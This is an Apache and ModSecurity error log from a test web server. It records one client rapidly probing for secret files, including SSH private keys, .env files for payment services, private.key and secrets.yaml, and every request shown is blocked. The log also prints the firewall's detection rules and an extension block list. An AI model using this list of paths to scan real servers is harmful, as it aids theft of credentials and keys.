[Mon Sep 30 03:12:42.662215 2024] [:error] [pid 2293079] [client 45.135.232.70:54416] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".profile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .profile found within REQUEST_FILENAME: /home/user/.profile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.profile"] [unique_id "Zvn7CoPBuFIGO_F-AsknvAAAABI"]
[Mon Sep 30 03:12:42.662487 2024] [:error] [pid 2293079] [client 45.135.232.70:54416] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.profile"] [unique_id "Zvn7CoPBuFIGO_F-AsknvAAAABI"]
[Mon Sep 30 03:12:42.662631 2024] [:error] [pid 2293079] [client 45.135.232.70:54416] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.profile"] [unique_id "Zvn7CoPBuFIGO_F-AsknvAAAABI"]
[Mon Sep 30 03:12:42.664068 2024] [:error] [pid 2293064] [client 45.135.232.70:54404] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".bashrc" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .bashrc found within REQUEST_FILENAME: /home/user/.bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bashrc"] [unique_id "Zvn7CvlRPa8kw2k9ENXZbwAAAAk"]
[Mon Sep 30 03:12:42.664277 2024] [:error] [pid 2293064] [client 45.135.232.70:54404] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bashrc"] [unique_id "Zvn7CvlRPa8kw2k9ENXZbwAAAAk"]
[Mon Sep 30 03:12:42.664420 2024] [:error] [pid 2293064] [client 45.135.232.70:54404] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.bashrc"] [unique_id "Zvn7CvlRPa8kw2k9ENXZbwAAAAk"]
[Mon Sep 30 03:12:42.667439 2024] [:error] [pid 2293069] [client 45.135.232.70:54418] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".ssh/authorized_keys" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/authorized_keys found within REQUEST_FILENAME: /home/user/.ssh/authorized_keys"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/authorized_keys"] [unique_id "Zvn7CvWER84gTHmrYh9xbAAAAAo"]
[Mon Sep 30 03:12:42.667609 2024] [:error] [pid 2293069] [client 45.135.232.70:54418] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/authorized_keys"] [unique_id "Zvn7CvWER84gTHmrYh9xbAAAAAo"]
[Mon Sep 30 03:12:42.667744 2024] [:error] [pid 2293069] [client 45.135.232.70:54418] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/authorized_keys"] [unique_id "Zvn7CvWER84gTHmrYh9xbAAAAAo"]
[Mon Sep 30 03:12:42.724449 2024] [:error] [pid 2293078] [client 45.135.232.70:54430] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /home/user/.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/id_rsa"] [unique_id "Zvn7CgdPKjVeEEGhcpSkGQAAABE"]
[Mon Sep 30 03:12:42.724747 2024] [:error] [pid 2293078] [client 45.135.232.70:54430] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/id_rsa"] [unique_id "Zvn7CgdPKjVeEEGhcpSkGQAAABE"]
[Mon Sep 30 03:12:42.724954 2024] [:error] [pid 2293078] [client 45.135.232.70:54430] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.ssh/id_rsa"] [unique_id "Zvn7CgdPKjVeEEGhcpSkGQAAABE"]
[Mon Sep 30 03:12:42.758388 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:54622] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Mon Sep 30 03:12:42.770092 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:54592] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/k8s
[Mon Sep 30 03:12:42.771409 2024] [authz_core:error] [pid 2293080] [client 45.135.232.70:54616] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kube
[Mon Sep 30 03:12:42.788924 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:54642] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Mon Sep 30 03:12:42.790816 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:54630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Mon Sep 30 03:12:42.807824 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:54654] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Mon Sep 30 03:12:42.818317 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:54662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Mon Sep 30 03:12:42.858888 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:54672] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kustomization.yml
[Mon Sep 30 03:12:42.924411 2024] [authz_core:error] [pid 2293090] [client 45.135.232.70:54728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Mon Sep 30 03:12:42.934897 2024] [authz_core:error] [pid 2293088] [client 45.135.232.70:54742] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logstash.conf
[Mon Sep 30 03:12:42.935382 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:54740] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Mon Sep 30 03:12:42.964402 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:54878] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:42.968539 2024] [:error] [pid 2293095] [client 45.135.232.70:54832] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/user/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/config/.env"] [unique_id "Zvn7CtvptIuYti24ZwPangAAAB0"]
[Mon Sep 30 03:12:42.968841 2024] [:error] [pid 2293095] [client 45.135.232.70:54832] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/config/.env"] [unique_id "Zvn7CtvptIuYti24ZwPangAAAB0"]
[Mon Sep 30 03:12:42.969023 2024] [:error] [pid 2293095] [client 45.135.232.70:54832] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/config/.env"] [unique_id "Zvn7CtvptIuYti24ZwPangAAAB0"]
[Mon Sep 30 03:12:42.981031 2024] [authz_core:error] [pid 2293094] [client 45.135.232.70:54822] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/nginx
[Mon Sep 30 03:12:43.057866 2024] [authz_core:error] [pid 2293088] [client 45.135.232.70:54964] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.059823 2024] [authz_core:error] [pid 2293078] [client 45.135.232.70:54890] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.067189 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:54936] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.068577 2024] [:error] [pid 2293096] [client 45.135.232.70:54816] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvn7C20c3HwZpcHtQkyy3gAAAB4"]
[Mon Sep 30 03:12:43.068927 2024] [:error] [pid 2293096] [client 45.135.232.70:54816] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvn7C20c3HwZpcHtQkyy3gAAAB4"]
[Mon Sep 30 03:12:43.069167 2024] [:error] [pid 2293096] [client 45.135.232.70:54816] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/user/.env"] [unique_id "Zvn7C20c3HwZpcHtQkyy3gAAAB4"]
[Mon Sep 30 03:12:43.072436 2024] [:error] [pid 2293095] [client 45.135.232.70:54806] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/payment/config/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvn7C9vptIuYti24ZwPanwAAAB0"]
[Mon Sep 30 03:12:43.072626 2024] [:error] [pid 2293095] [client 45.135.232.70:54806] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvn7C9vptIuYti24ZwPanwAAAB0"]
[Mon Sep 30 03:12:43.072797 2024] [:error] [pid 2293095] [client 45.135.232.70:54806] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/config/.env.prod"] [unique_id "Zvn7C9vptIuYti24ZwPanwAAAB0"]
[Mon Sep 30 03:12:43.074030 2024] [:error] [pid 2292852] [client 45.135.232.70:54808] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservices/payment/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvn7C9yjaeShYxtARZticAAAAAU"]
[Mon Sep 30 03:12:43.074218 2024] [:error] [pid 2292852] [client 45.135.232.70:54808] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvn7C9yjaeShYxtARZticAAAAAU"]
[Mon Sep 30 03:12:43.089447 2024] [:error] [pid 2292852] [client 45.135.232.70:54808] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/microservices/payment/.env.production"] [unique_id "Zvn7C9yjaeShYxtARZticAAAAAU"]
[Mon Sep 30 03:12:43.090515 2024] [authz_core:error] [pid 2293094] [client 45.135.232.70:54804] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/moto
[Mon Sep 30 03:12:43.098022 2024] [authz_core:error] [pid 2293101] [client 45.135.232.70:54900] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.115804 2024] [authz_core:error] [pid 2293102] [client 45.135.232.70:54862] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/nginx.conf
[Mon Sep 30 03:12:43.138876 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:55128] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.146847 2024] [authz_core:error] [pid 2293103] [client 45.135.232.70:55156] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.160522 2024] [authz_core:error] [pid 2293088] [client 45.135.232.70:55202] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/parameters.yml
[Mon Sep 30 03:12:43.170093 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:55352] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/pipeline
[Mon Sep 30 03:12:43.180813 2024] [authz_core:error] [pid 2293096] [client 45.135.232.70:55246] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpspec.yml
[Mon Sep 30 03:12:43.227672 2024] [authz_core:error] [pid 2293105] [client 45.135.232.70:55414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.239683 2024] [authz_core:error] [pid 2293095] [client 45.135.232.70:55374] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/pre-commit-config.yaml
[Mon Sep 30 03:12:43.242019 2024] [:error] [pid 2293069] [client 45.135.232.70:55224] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Zvn7C_WER84gTHmrYh9xcAAAAAo"]
[Mon Sep 30 03:12:43.242301 2024] [:error] [pid 2293069] [client 45.135.232.70:55224] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Zvn7C_WER84gTHmrYh9xcAAAAAo"]
[Mon Sep 30 03:12:43.242458 2024] [:error] [pid 2293069] [client 45.135.232.70:55224] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "Zvn7C_WER84gTHmrYh9xcAAAAAo"]
[Mon Sep 30 03:12:43.264603 2024] [:error] [pid 2293061] [client 45.135.232.70:55498] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/private.key"] [unique_id "Zvn7C_4plfEpgwUkwScOiQAAAAc"]
[Mon Sep 30 03:12:43.264958 2024] [:error] [pid 2293061] [client 45.135.232.70:55498] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/private.key"] [unique_id "Zvn7C_4plfEpgwUkwScOiQAAAAc"]
[Mon Sep 30 03:12:43.265111 2024] [:error] [pid 2293061] [client 45.135.232.70:55498] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/private.key"] [unique_id "Zvn7C_4plfEpgwUkwScOiQAAAAc"]
[Mon Sep 30 03:12:43.273517 2024] [authz_core:error] [pid 2293077] [client 45.135.232.70:55510] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/parameters.yml.dist
[Mon Sep 30 03:12:43.288572 2024] [authz_core:error] [pid 2293096] [client 45.135.232.70:55018] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.290192 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:55588] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/pubspec.yaml
[Mon Sep 30 03:12:43.340135 2024] [authz_core:error] [pid 2293095] [client 45.135.232.70:55458] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phinx.yaml
[Mon Sep 30 03:12:43.366222 2024] [authz_core:error] [pid 2293077] [client 45.135.232.70:55648] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/radio
[Mon Sep 30 03:12:43.380770 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:55800] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/secrets.yaml
[Mon Sep 30 03:12:43.475317 2024] [authz_core:error] [pid 2293095] [client 45.135.232.70:55214] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.492303 2024] [authz_core:error] [pid 2293080] [client 45.135.232.70:55208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phinx.yml
[Mon Sep 30 03:12:43.493904 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:55082] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/opt
[Mon Sep 30 03:12:43.510316 2024] [:error] [pid 2293079] [client 45.135.232.70:55280] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/ormconfig.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /ormconfig.json found within REQUEST_FILENAME: /ormconfig.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/ormconfig.json"] [unique_id "Zvn7C4PBuFIGO_F-AsknvwAAABI"]
